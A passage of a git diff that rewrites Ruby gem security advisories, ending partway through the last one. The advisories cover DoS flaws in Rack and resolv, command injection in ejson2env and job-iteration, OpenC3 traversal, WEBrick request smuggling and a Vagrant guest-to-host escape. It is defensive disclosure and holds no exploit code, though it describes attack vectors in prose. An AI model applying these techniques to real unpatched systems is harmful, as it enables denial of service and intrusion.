+    - https://github.com/advisories/GHSA-9j94-67jr-4cqj
+---
diff --git a/advisories/_posts/2025-05-08-CVE-2025-46727.md b/advisories/_posts/2025-05-08-CVE-2025-46727.md
index a87d6d71..63774f60 100644
--- a/advisories/_posts/2025-05-08-CVE-2025-46727.md
+++ b/advisories/_posts/2025-05-08-CVE-2025-46727.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2025-46727 (rack): Rack has an Unbounded-Parameter DoS in Rack::QueryParser'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-46727
-  ghsa: gjh7-p2fx-99vx
-  url: https://github.com/rack/rack/security/advisories/GHSA-gjh7-p2fx-99vx
-  title: Rack has an Unbounded-Parameter DoS in Rack::QueryParser
-  date: 2025-05-08
-  description: |
-    ## Summary
-
-    `Rack::QueryParser` parses query strings and
-    `application/x-www-form-urlencoded` bodies into Ruby data structures
-    without imposing any limit on the number of parameters, allowing
-    attackers to send requests with extremely large numbers of parameters.
-
-    ## Details
-
-    The vulnerability arises because `Rack::QueryParser` iterates over
-    each `&`-separated key-value pair and adds it to a Hash without
-    enforcing an upper bound on the total number of parameters. This
-    allows an attacker to send a single request containing hundreds of
-    thousands (or more) of parameters, which consumes excessive memory
-    and CPU during parsing.
-
-    ## Impact
-
-    An attacker can trigger denial of service by sending specifically
-    crafted HTTP requests, which can cause memory exhaustion or pin CPU
-    resources, stalling or crashing the Rack server. This results in
-    full service disruption until the affected worker is restarted.
-
-    ## Mitigation
-
-    - Update to a version of Rack that limits the number of parameters parsed, or
-    - Use middleware to enforce a maximum query string size or parameter count, or
-    - Employ a reverse proxy (such as Nginx) to limit request sizes and
-      reject oversized query strings or bodies.
-
-    Limiting request body sizes and query string lengths at the web
-    server or CDN level is an effective mitigation.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.14"
-  - "~> 3.0.16"
-  - ">= 3.1.14"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-46727
-    - https://github.com/rack/rack/security/advisories/GHSA-gjh7-p2fx-99vx
-    - https://github.com/rack/rack/commit/2bb5263b464b65ba4b648996a579dbd180d2b712
-    - https://github.com/rack/rack/commit/3f5a4249118d09d199fe480466c8c6717e43b6e3
-    - https://github.com/rack/rack/commit/cd6b70a1f2a1016b73dc906f924869f4902c2d74
-    - https://github.com/advisories/GHSA-gjh7-p2fx-99vx
----
+---
+layout: advisory
+title: 'CVE-2025-46727 (rack): Rack has an Unbounded-Parameter DoS in Rack::QueryParser'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-46727
+  ghsa: gjh7-p2fx-99vx
+  url: https://github.com/rack/rack/security/advisories/GHSA-gjh7-p2fx-99vx
+  title: Rack has an Unbounded-Parameter DoS in Rack::QueryParser
+  date: 2025-05-08
+  description: |
+    ## Summary
+
+    `Rack::QueryParser` parses query strings and
+    `application/x-www-form-urlencoded` bodies into Ruby data structures
+    without imposing any limit on the number of parameters, allowing
+    attackers to send requests with extremely large numbers of parameters.
+
+    ## Details
+
+    The vulnerability arises because `Rack::QueryParser` iterates over
+    each `&`-separated key-value pair and adds it to a Hash without
+    enforcing an upper bound on the total number of parameters. This
+    allows an attacker to send a single request containing hundreds of
+    thousands (or more) of parameters, which consumes excessive memory
+    and CPU during parsing.
+
+    ## Impact
+
+    An attacker can trigger denial of service by sending specifically
+    crafted HTTP requests, which can cause memory exhaustion or pin CPU
+    resources, stalling or crashing the Rack server. This results in
+    full service disruption until the affected worker is restarted.
+
+    ## Mitigation
+
+    - Update to a version of Rack that limits the number of parameters parsed, or
+    - Use middleware to enforce a maximum query string size or parameter count, or
+    - Employ a reverse proxy (such as Nginx) to limit request sizes and
+      reject oversized query strings or bodies.
+
+    Limiting request body sizes and query string lengths at the web
+    server or CDN level is an effective mitigation.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.14"
+  - "~> 3.0.16"
+  - ">= 3.1.14"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-46727
+    - https://github.com/rack/rack/security/advisories/GHSA-gjh7-p2fx-99vx
+    - https://github.com/rack/rack/commit/2bb5263b464b65ba4b648996a579dbd180d2b712
+    - https://github.com/rack/rack/commit/3f5a4249118d09d199fe480466c8c6717e43b6e3
+    - https://github.com/rack/rack/commit/cd6b70a1f2a1016b73dc906f924869f4902c2d74
+    - https://github.com/advisories/GHSA-gjh7-p2fx-99vx
+---
diff --git a/advisories/_posts/2025-05-21-CVE-2025-48069.md b/advisories/_posts/2025-05-21-CVE-2025-48069.md
index d7602dd7..89db69dd 100644
--- a/advisories/_posts/2025-05-21-CVE-2025-48069.md
+++ b/advisories/_posts/2025-05-21-CVE-2025-48069.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2025-48069 (ejson2env): Insufficient input sanitization in ejson2env'
-comments: false
-categories:
-- ejson2env
-advisory:
-  gem: ejson2env
-  cve: 2025-48069
-  ghsa: 2c47-m757-32g6
-  url: https://github.com/Shopify/ejson2env/security/advisories/GHSA-2c47-m757-32g6
-  title: Insufficient input sanitization in ejson2env
-  date: 2025-05-21
-  description: |
-    ### Summary
-    The `ejson2env` tool has a vulnerability related to how it writes to
-    `stdout`. Specifically, the tool is intended to write an export
-    statement for environment variables and their values. However, due
-    to inadequate output sanitization, there is a potential risk where
-    variable names or values may include malicious content, resulting
-    in additional unintended commands being output to `stdout`. If this
-    output is improperly utilized in further command execution, it could
-    lead to command injection vulnerabilities, allowing an attacker to
-    execute arbitrary commands on the host system.
-
-    ### Details
-    The vulnerability exists because environment variables are not
-    properly sanitized during the decryption phase, which enables
-    malicious keys or encrypted values to inject commands.
-
-    ### Impact
-    An attacker with control over `.ejson` files can inject commands
-    in the environment where `source $(ejson2env)` or `eval ejson2env`
-    are executed.
-
-    ### Mitigation
-    - Update to a version of `ejson2env` that sanitizes the output
-      during decryption or
-    - Do not use `ejson2env` to decrypt untrusted user secrets or
-    - Do not evaluate or execute the direct output from `ejson2env`
-      without removing nonprintable characters.
-
-    ### Credit
-    Thanks to security researcher [Demonia](https://hackerone.com/demonia?type=user)
-    for reporting this issue.
-  cvss_v3: 6.6
-  patched_versions:
-  - ">= 2.0.8"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-48069
-    - https://github.com/Shopify/ejson2env/security/advisories/GHSA-2c47-m757-32g6
-    - https://github.com/Shopify/ejson2env/commit/592b3ceea967fee8b064e70983e8cec087b6d840
-    - https://github.com/advisories/GHSA-2c47-m757-32g6
----
+---
+layout: advisory
+title: 'CVE-2025-48069 (ejson2env): Insufficient input sanitization in ejson2env'
+comments: false
+categories:
+- ejson2env
+advisory:
+  gem: ejson2env
+  cve: 2025-48069
+  ghsa: 2c47-m757-32g6
+  url: https://github.com/Shopify/ejson2env/security/advisories/GHSA-2c47-m757-32g6
+  title: Insufficient input sanitization in ejson2env
+  date: 2025-05-21
+  description: |
+    ### Summary
+    The `ejson2env` tool has a vulnerability related to how it writes to
+    `stdout`. Specifically, the tool is intended to write an export
+    statement for environment variables and their values. However, due
+    to inadequate output sanitization, there is a potential risk where
+    variable names or values may include malicious content, resulting
+    in additional unintended commands being output to `stdout`. If this
+    output is improperly utilized in further command execution, it could
+    lead to command injection vulnerabilities, allowing an attacker to
+    execute arbitrary commands on the host system.
+
+    ### Details
+    The vulnerability exists because environment variables are not
+    properly sanitized during the decryption phase, which enables
+    malicious keys or encrypted values to inject commands.
+
+    ### Impact
+    An attacker with control over `.ejson` files can inject commands
+    in the environment where `source $(ejson2env)` or `eval ejson2env`
+    are executed.
+
+    ### Mitigation
+    - Update to a version of `ejson2env` that sanitizes the output
+      during decryption or
+    - Do not use `ejson2env` to decrypt untrusted user secrets or
+    - Do not evaluate or execute the direct output from `ejson2env`
+      without removing nonprintable characters.
+
+    ### Credit
+    Thanks to security researcher [Demonia](https://hackerone.com/demonia?type=user)
+    for reporting this issue.
+  cvss_v3: 6.6
+  patched_versions:
+  - ">= 2.0.8"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48069
+    - https://github.com/Shopify/ejson2env/security/advisories/GHSA-2c47-m757-32g6
+    - https://github.com/Shopify/ejson2env/commit/592b3ceea967fee8b064e70983e8cec087b6d840
+    - https://github.com/advisories/GHSA-2c47-m757-32g6
+---
diff --git a/advisories/_posts/2025-06-05-CVE-2025-49007.md b/advisories/_posts/2025-06-05-CVE-2025-49007.md
index 8b3d098d..5137b1c7 100644
--- a/advisories/_posts/2025-06-05-CVE-2025-49007.md
+++ b/advisories/_posts/2025-06-05-CVE-2025-49007.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2025-49007 (rack): ReDoS Vulnerability in Rack::Multipart handle_mime_head'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-49007
-  ghsa: 47m2-26rw-j2jw
-  url: https://github.com/rack/rack/security/advisories/GHSA-47m2-26rw-j2jw
-  title: ReDoS Vulnerability in Rack::Multipart handle_mime_head
-  date: 2025-06-05
-  description: |
-    ### Summary
-
-    There is a denial of service vulnerability in the
-    Content-Disposition parsing component of Rack. This is very
-    similar to the previous security issue CVE-2022-44571.
-
-    ### Details
-
-    Carefully crafted input can cause Content-Disposition header
-    parsing in Rack to take an unexpected amount of time, possibly
-    resulting in a denial of service attack vector. This header is
-    used typically used in multipart parsing. Any applications that
-    parse multipart posts using Rack (virtually all Rails applications)
-    are impacted.
-
-    ### Credits
-
-    Thanks to [scyoon](https://hackerone.com/scyoon) for reporting
-    this to the Rails security team
-  cvss_v4: 6.6
-  unaffected_versions:
-  - "< 3.1.0"
-  patched_versions:
-  - ">= 3.1.16"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-49007
-    - https://github.com/rack/rack/security/advisories/GHSA-47m2-26rw-j2jw
-    - https://github.com/rack/rack/commit/4795831a0a310c2d31102749e551b38faab6401f
-    - https://github.com/rack/rack/commit/aed514df37e33907df3c971ed3ca9a0a20ac2901
-    - https://github.com/advisories/GHSA-47m2-26rw-j2jw
----
+---
+layout: advisory
+title: 'CVE-2025-49007 (rack): ReDoS Vulnerability in Rack::Multipart handle_mime_head'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-49007
+  ghsa: 47m2-26rw-j2jw
+  url: https://github.com/rack/rack/security/advisories/GHSA-47m2-26rw-j2jw
+  title: ReDoS Vulnerability in Rack::Multipart handle_mime_head
+  date: 2025-06-05
+  description: |
+    ### Summary
+
+    There is a denial of service vulnerability in the
+    Content-Disposition parsing component of Rack. This is very
+    similar to the previous security issue CVE-2022-44571.
+
+    ### Details
+
+    Carefully crafted input can cause Content-Disposition header
+    parsing in Rack to take an unexpected amount of time, possibly
+    resulting in a denial of service attack vector. This header is
+    used typically used in multipart parsing. Any applications that
+    parse multipart posts using Rack (virtually all Rails applications)
+    are impacted.
+
+    ### Credits
+
+    Thanks to [scyoon](https://hackerone.com/scyoon) for reporting
+    this to the Rails security team
+  cvss_v4: 6.6
+  unaffected_versions:
+  - "< 3.1.0"
+  patched_versions:
+  - ">= 3.1.16"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49007
+    - https://github.com/rack/rack/security/advisories/GHSA-47m2-26rw-j2jw
+    - https://github.com/rack/rack/commit/4795831a0a310c2d31102749e551b38faab6401f
+    - https://github.com/rack/rack/commit/aed514df37e33907df3c971ed3ca9a0a20ac2901
+    - https://github.com/advisories/GHSA-47m2-26rw-j2jw
+---
diff --git a/advisories/_posts/2025-06-13-CVE-2025-28382.md b/advisories/_posts/2025-06-13-CVE-2025-28382.md
index 8787c3d1..6d2179ce 100644
--- a/advisories/_posts/2025-06-13-CVE-2025-28382.md
+++ b/advisories/_posts/2025-06-13-CVE-2025-28382.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2025-28382 (openc3-cosmos-tool-iframe): OpenC3 COSMOS Vulnerable to Directory
-  Traversal via openc3-api/tables endpoint'
-comments: false
-categories:
-- openc3-cosmos-tool-iframe
-advisory:
-  gem: openc3-cosmos-tool-iframe
-  cve: 2025-28382
-  ghsa: cf8v-5mrc-jv7f
-  url: https://github.com/advisories/GHSA-cf8v-5mrc-jv7f
-  title: OpenC3 COSMOS Vulnerable to Directory Traversal via openc3-api/tables endpoint
-  date: 2025-06-13
-  description: |
-    An issue in the openc3-api/tables endpoint of OpenC3 COSMOS
-    6.0.0 allows attackers to execute a directory traversal.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 6.0.0"
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-28382
-    - https://visionspace.com/openc3-cosmos-a-security-assessment-of-an-open-source-mission-framework
-    - https://openc3.com
-    - https://github.com/advisories/GHSA-cf8v-5mrc-jv7f
----
+---
+layout: advisory
+title: 'CVE-2025-28382 (openc3-cosmos-tool-iframe): OpenC3 COSMOS Vulnerable to Directory
+  Traversal via openc3-api/tables endpoint'
+comments: false
+categories:
+- openc3-cosmos-tool-iframe
+advisory:
+  gem: openc3-cosmos-tool-iframe
+  cve: 2025-28382
+  ghsa: cf8v-5mrc-jv7f
+  url: https://github.com/advisories/GHSA-cf8v-5mrc-jv7f
+  title: OpenC3 COSMOS Vulnerable to Directory Traversal via openc3-api/tables endpoint
+  date: 2025-06-13
+  description: |
+    An issue in the openc3-api/tables endpoint of OpenC3 COSMOS
+    6.0.0 allows attackers to execute a directory traversal.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 6.0.0"
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-28382
+    - https://visionspace.com/openc3-cosmos-a-security-assessment-of-an-open-source-mission-framework
+    - https://openc3.com
+    - https://github.com/advisories/GHSA-cf8v-5mrc-jv7f
+---
diff --git a/advisories/_posts/2025-06-13-CVE-2025-28384.md b/advisories/_posts/2025-06-13-CVE-2025-28384.md
index 64d2af4d..a4b9f0f9 100644
--- a/advisories/_posts/2025-06-13-CVE-2025-28384.md
+++ b/advisories/_posts/2025-06-13-CVE-2025-28384.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2025-28384 (openc3-cosmos-tool-iframe): OpenC3 COSMOS Vulnerable to Directory
-  Traversal via /script-api/scripts/ endpoint'
-comments: false
-categories:
-- openc3-cosmos-tool-iframe
-advisory:
-  gem: openc3-cosmos-tool-iframe
-  cve: 2025-28384
-  ghsa: p67j-387g-75wc
-  url: https://github.com/advisories/GHSA-p67j-387g-75wc
-  title: OpenC3 COSMOS Vulnerable to Directory Traversal via /script-api/scripts/
-    endpoint
-  date: 2025-06-13
-  description: |
-    An issue in the /script-api/scripts/ endpoint of OpenC3 COSMOS
-    6.0.0 allows attackers to execute a directory traversal.
-  cvss_v3: 9.1
-  unaffected_versions:
-  - "< 6.0.0"
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-28384
-    - https://visionspace.com/openc3-cosmos-a-security-assessment-of-an-open-source-mission-framework
-    - https://openc3.com
-    - https://github.com/advisories/GHSA-p67j-387g-75wc
----
+---
+layout: advisory
+title: 'CVE-2025-28384 (openc3-cosmos-tool-iframe): OpenC3 COSMOS Vulnerable to Directory
+  Traversal via /script-api/scripts/ endpoint'
+comments: false
+categories:
+- openc3-cosmos-tool-iframe
+advisory:
+  gem: openc3-cosmos-tool-iframe
+  cve: 2025-28384
+  ghsa: p67j-387g-75wc
+  url: https://github.com/advisories/GHSA-p67j-387g-75wc
+  title: OpenC3 COSMOS Vulnerable to Directory Traversal via /script-api/scripts/
+    endpoint
+  date: 2025-06-13
+  description: |
+    An issue in the /script-api/scripts/ endpoint of OpenC3 COSMOS
+    6.0.0 allows attackers to execute a directory traversal.
+  cvss_v3: 9.1
+  unaffected_versions:
+  - "< 6.0.0"
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-28384
+    - https://visionspace.com/openc3-cosmos-a-security-assessment-of-an-open-source-mission-framework
+    - https://openc3.com
+    - https://github.com/advisories/GHSA-p67j-387g-75wc
+---
diff --git a/advisories/_posts/2025-06-26-CVE-2025-6442.md b/advisories/_posts/2025-06-26-CVE-2025-6442.md
index d8f08ae5..15a35ea2 100644
--- a/advisories/_posts/2025-06-26-CVE-2025-6442.md
+++ b/advisories/_posts/2025-06-26-CVE-2025-6442.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2025-6442 (webrick): Ruby WEBrick read_headers method can lead to HTTP
-  Request/Response Smuggling'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2025-6442
-  ghsa: r995-q44h-hr64
-  url: https://github.com/advisories/GHSA-r995-q44h-hr64
-  title: Ruby WEBrick read_headers method can lead to HTTP Request/Response Smuggling
-  date: 2025-06-26
-  description: |
-    Ruby WEBrick read_header HTTP Request Smuggling Vulnerability
-
-    This vulnerability allows remote attackers to smuggle arbitrary HTTP
-    requests on affected installations of Ruby WEBrick. This issue is
-    exploitable when the product is deployed behind an HTTP proxy that
-    fulfills specific conditions.
-
-    The specific flaw exists within the read_headers method. The issue
-    results from the inconsistent parsing of terminators of HTTP headers.
-    An attacker can leverage this vulnerability to smuggle arbitrary
-    HTTP requests. Was ZDI-CAN-21876.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 1.8.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-6442
-    - https://github.com/ruby/webrick/commit/ee60354bcb84ec33b9245e1d1aa6e1f7e8132101#diff-ad02984d873efb089aa51551bc6b7d307a53e0ba1ac439e91d69c2e58a478864
-    - https://www.zerodayinitiative.com/advisories/ZDI-25-414
-    - https://github.com/advisories/GHSA-r995-q44h-hr64
----
+---
+layout: advisory
+title: 'CVE-2025-6442 (webrick): Ruby WEBrick read_headers method can lead to HTTP
+  Request/Response Smuggling'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2025-6442
+  ghsa: r995-q44h-hr64
+  url: https://github.com/advisories/GHSA-r995-q44h-hr64
+  title: Ruby WEBrick read_headers method can lead to HTTP Request/Response Smuggling
+  date: 2025-06-26
+  description: |
+    Ruby WEBrick read_header HTTP Request Smuggling Vulnerability
+
+    This vulnerability allows remote attackers to smuggle arbitrary HTTP
+    requests on affected installations of Ruby WEBrick. This issue is
+    exploitable when the product is deployed behind an HTTP proxy that
+    fulfills specific conditions.
+
+    The specific flaw exists within the read_headers method. The issue
+    results from the inconsistent parsing of terminators of HTTP headers.
+    An attacker can leverage this vulnerability to smuggle arbitrary
+    HTTP requests. Was ZDI-CAN-21876.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 1.8.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-6442
+    - https://github.com/ruby/webrick/commit/ee60354bcb84ec33b9245e1d1aa6e1f7e8132101#diff-ad02984d873efb089aa51551bc6b7d307a53e0ba1ac439e91d69c2e58a478864
+    - https://www.zerodayinitiative.com/advisories/ZDI-25-414
+    - https://github.com/advisories/GHSA-r995-q44h-hr64
+---
diff --git a/advisories/_posts/2025-07-02-CVE-2025-34075.md b/advisories/_posts/2025-07-02-CVE-2025-34075.md
index fb25d8c2..ba83af6c 100644
--- a/advisories/_posts/2025-07-02-CVE-2025-34075.md
+++ b/advisories/_posts/2025-07-02-CVE-2025-34075.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2025-34075 (vagrant): HashiCorp Vagrant has code injection vulnerability
-  through default synced folders'
-comments: false
-categories:
-- vagrant
-advisory:
-  gem: vagrant
-  cve: 2025-34075
-  ghsa: hqp6-mjw3-f586
-  url: https://github.com/advisories/GHSA-hqp6-mjw3-f586
-  title: HashiCorp Vagrant has code injection vulnerability through default synced
-    folders
-  date: 2025-07-02
-  description: |
-    An authenticated virtual machine escape vulnerability exists in
-    HashiCorp Vagrant versions 2.4.6 and below when using the default
-    synced folder configuration. By design, Vagrant automatically mounts
-    the host system’s project directory into the guest VM under /vagrant
-    (or C:\vagrant on Windows). This includes the Vagrantfile configuration
-    file, which is a Ruby script evaluated by the host every time a vagrant
-    command is executed in the project directory. If a low-privileged
-    attacker obtains shell access to the guest VM, they can append
-    arbitrary Ruby code to the mounted Vagrantfile. When a user on the
-    host later runs any vagrant command, the injected code is executed
-    on the host with that user’s privileges.
-
-    While this shared-folder behavior is well-documented by Vagrant, the
-    security implications of Vagrantfile execution from guest-writable
-    storage are not explicitly addressed. This effectively enables
-    guest-to-host code execution in multi-tenant or adversarial VM scenarios.
-  cvss_v4: 5.4
-  unaffected_versions:
-  - "< 2.2.10"
-  patched_versions:
-  - ">= 2.4.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-34075
-    - https://developer.hashicorp.com/vagrant
-    - https://developer.hashicorp.com/vagrant/docs/synced-folders/basic_usage
-    - https://developer.hashicorp.com/vagrant/docs/vagrantfile
-    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/local/vagrant_synced_folder_vagrantfile_breakout.rb
-    - https://vulncheck.com/advisories/hashicorp-vagrant-synced-folder-vagrantfile-breakout
-    - https://github.com/hashicorp/vagrant/issues/13688
-    - https://github.com/hashicorp/vagrant/commit/abe87b2fdc124ef426c016d44d2f6f4792f0cbe3
-    - https://github.com/advisories/GHSA-hqp6-mjw3-f586
----
+---
+layout: advisory
+title: 'CVE-2025-34075 (vagrant): HashiCorp Vagrant has code injection vulnerability
+  through default synced folders'
+comments: false
+categories:
+- vagrant
+advisory:
+  gem: vagrant
+  cve: 2025-34075
+  ghsa: hqp6-mjw3-f586
+  url: https://github.com/advisories/GHSA-hqp6-mjw3-f586
+  title: HashiCorp Vagrant has code injection vulnerability through default synced
+    folders
+  date: 2025-07-02
+  description: |
+    An authenticated virtual machine escape vulnerability exists in
+    HashiCorp Vagrant versions 2.4.6 and below when using the default
+    synced folder configuration. By design, Vagrant automatically mounts
+    the host system’s project directory into the guest VM under /vagrant
+    (or C:\vagrant on Windows). This includes the Vagrantfile configuration
+    file, which is a Ruby script evaluated by the host every time a vagrant
+    command is executed in the project directory. If a low-privileged
+    attacker obtains shell access to the guest VM, they can append
+    arbitrary Ruby code to the mounted Vagrantfile. When a user on the
+    host later runs any vagrant command, the injected code is executed
+    on the host with that user’s privileges.
+
+    While this shared-folder behavior is well-documented by Vagrant, the
+    security implications of Vagrantfile execution from guest-writable
+    storage are not explicitly addressed. This effectively enables
+    guest-to-host code execution in multi-tenant or adversarial VM scenarios.
+  cvss_v4: 5.4
+  unaffected_versions:
+  - "< 2.2.10"
+  patched_versions:
+  - ">= 2.4.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34075
+    - https://developer.hashicorp.com/vagrant
+    - https://developer.hashicorp.com/vagrant/docs/synced-folders/basic_usage
+    - https://developer.hashicorp.com/vagrant/docs/vagrantfile
+    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/local/vagrant_synced_folder_vagrantfile_breakout.rb
+    - https://vulncheck.com/advisories/hashicorp-vagrant-synced-folder-vagrantfile-breakout
+    - https://github.com/hashicorp/vagrant/issues/13688
+    - https://github.com/hashicorp/vagrant/commit/abe87b2fdc124ef426c016d44d2f6f4792f0cbe3
+    - https://github.com/advisories/GHSA-hqp6-mjw3-f586
+---
diff --git a/advisories/_posts/2025-07-09-CVE-2025-24294.md b/advisories/_posts/2025-07-09-CVE-2025-24294.md
index 5309eccd..13b1879d 100644
--- a/advisories/_posts/2025-07-09-CVE-2025-24294.md
+++ b/advisories/_posts/2025-07-09-CVE-2025-24294.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2025-24294 (resolv): Possible Denial of Service in resolv gem'
-comments: false
-categories:
-- resolv
-advisory:
-  gem: resolv
-  cve: 2025-24294
-  ghsa: xh69-987w-hrp8
-  url: https://www.ruby-lang.org/en/news/2025/07/08/dos-resolv-cve-2025-24294
-  title: Possible Denial of Service in resolv gem
-  date: 2025-07-09
-  description: |
-    A denial of service vulnerability has been discovered in the
-    resolv gem bundled with Ruby.
-    This vulnerability has been assigned the CVE identifier
-    CVE-2025-24294. We recommend upgrading the resolv gem.
-
-    ## Details
-    The vulnerability is caused by an insufficient check on the
-    length of a decompressed domain name within a DNS packet.
-
-    An attacker can craft a malicious DNS packet containing a highly
-    compressed domain name. When the resolv library parses such a
-    packet, the name decompression process consumes a large amount
-    of CPU resources, as the library does not limit the resulting
-    length of the name.
-
-    This resource consumption can cause the application thread to
-    become unresponsive, resulting in a Denial of Service condition.
-
-    ## Affected Version
-    The vulnerability affects the resolv gem bundled with the
-    following Ruby series:
-    * Ruby 3.2 series: resolv version 0.2.2 and earlier
-    * Ruby 3.3 series: resolv version 0.3.0
-    * Ruby 3.4 series: resolv version 0.6.1 and earlier
-
-    ## Credits
-    Thanks to Manu for discovering this issue.
-
-    ## History
-    Originally published at 2025-07-08 07:00:00 (UTC)
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 0.2.2"
-  - "~> 0.3.0"
-  - ">= 0.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-24294
-    - https://www.ruby-lang.org/en/news/2025/07/08/dos-resolv-cve-2025-24294
-    - https://rubygems.org/gems/resolv
-    - https://www.cve.org/CVERecord?id=CVE-2025-24294
-    - https://www.vuxml.org/freebsd/eed1a411-699b-11f0-91fe-000c295725e4.html
-    - https://github.com/advisories/GHSA-xh69-987w-hrp8
----
+---
+layout: advisory
+title: 'CVE-2025-24294 (resolv): Possible Denial of Service in resolv gem'
+comments: false
+categories:
+- resolv
+advisory:
+  gem: resolv
+  cve: 2025-24294
+  ghsa: xh69-987w-hrp8
+  url: https://www.ruby-lang.org/en/news/2025/07/08/dos-resolv-cve-2025-24294
+  title: Possible Denial of Service in resolv gem
+  date: 2025-07-09
+  description: |
+    A denial of service vulnerability has been discovered in the
+    resolv gem bundled with Ruby.
+    This vulnerability has been assigned the CVE identifier
+    CVE-2025-24294. We recommend upgrading the resolv gem.
+
+    ## Details
+    The vulnerability is caused by an insufficient check on the
+    length of a decompressed domain name within a DNS packet.
+
+    An attacker can craft a malicious DNS packet containing a highly
+    compressed domain name. When the resolv library parses such a
+    packet, the name decompression process consumes a large amount
+    of CPU resources, as the library does not limit the resulting
+    length of the name.
+
+    This resource consumption can cause the application thread to
+    become unresponsive, resulting in a Denial of Service condition.
+
+    ## Affected Version
+    The vulnerability affects the resolv gem bundled with the
+    following Ruby series:
+    * Ruby 3.2 series: resolv version 0.2.2 and earlier
+    * Ruby 3.3 series: resolv version 0.3.0
+    * Ruby 3.4 series: resolv version 0.6.1 and earlier
+
+    ## Credits
+    Thanks to Manu for discovering this issue.
+
+    ## History
+    Originally published at 2025-07-08 07:00:00 (UTC)
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 0.2.2"
+  - "~> 0.3.0"
+  - ">= 0.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24294
+    - https://www.ruby-lang.org/en/news/2025/07/08/dos-resolv-cve-2025-24294
+    - https://rubygems.org/gems/resolv
+    - https://www.cve.org/CVERecord?id=CVE-2025-24294
+    - https://www.vuxml.org/freebsd/eed1a411-699b-11f0-91fe-000c295725e4.html
+    - https://github.com/advisories/GHSA-xh69-987w-hrp8
+---
diff --git a/advisories/_posts/2025-07-14-CVE-2025-53623.md b/advisories/_posts/2025-07-14-CVE-2025-53623.md
index 14ed3ad9..bd399247 100644
--- a/advisories/_posts/2025-07-14-CVE-2025-53623.md
+++ b/advisories/_posts/2025-07-14-CVE-2025-53623.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2025-53623 (job-iteration): Job Iteration API is vulnerable to OS Command
-  Injection attack through its CsvEnumerator class'
-comments: false
-categories:
-- job-iteration
-advisory:
-  gem: job-iteration
-  cve: 2025-53623
-  ghsa: 6qjf-g333-pv38
-  url: https://github.com/Shopify/job-iteration/security/advisories/GHSA-6qjf-g333-pv38
-  title: Job Iteration API is vulnerable to OS Command Injection attack through its
-    CsvEnumerator class
-  date: 2025-07-14
-  description: |
-    ### Impact
-
-    There is an arbitrary code execution vulnerability in the
-    `CsvEnumerator` class of the `job-iteration` repository. This
-    vulnerability can be exploited by an attacker to execute arbitrary
-    commands on the system where the application is running, potentially
-    leading to unauthorized access, data leakage, or complete system
-    compromise.
-
-    ### Patches
-
-    Issue is fixed in versions `1.11.0` and above.
-
-    ### Workarounds
-
-    Users can mitigate the risk by avoiding the use of untrusted input
-    in the `CsvEnumerator` class and ensuring that any file paths are
-    properly sanitized and validated before being passed to the class
-    methods. Users should avoid calling `size` on enumerators
-    constructed with untrusted CSV filenames.
-  cvss_v4: 8.1
-  patched_versions:
-  - ">= 1.11"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-53623
-    - https://github.com/Shopify/job-iteration/security/advisories/GHSA-6qjf-g333-pv38
-    - https://github.com/Shopify/job-iteration/pull/595
-    - https://github.com/Shopify/job-iteration/commit/1a7adfdd041105a5e45e774cadc6b973a292ba55
-    - https://github.com/Shopify/job-iteration/releases/tag/v1.11.0
-    - https://github.com/advisories/GHSA-6qjf-g333-pv38
----
+---
+layout: advisory
+title: 'CVE-2025-53623 (job-iteration): Job Iteration API is vulnerable to OS Command
+  Injection attack through its CsvEnumerator class'
+comments: false
+categories:
+- job-iteration
+advisory:
+  gem: job-iteration
+  cve: 2025-53623
+  ghsa: 6qjf-g333-pv38
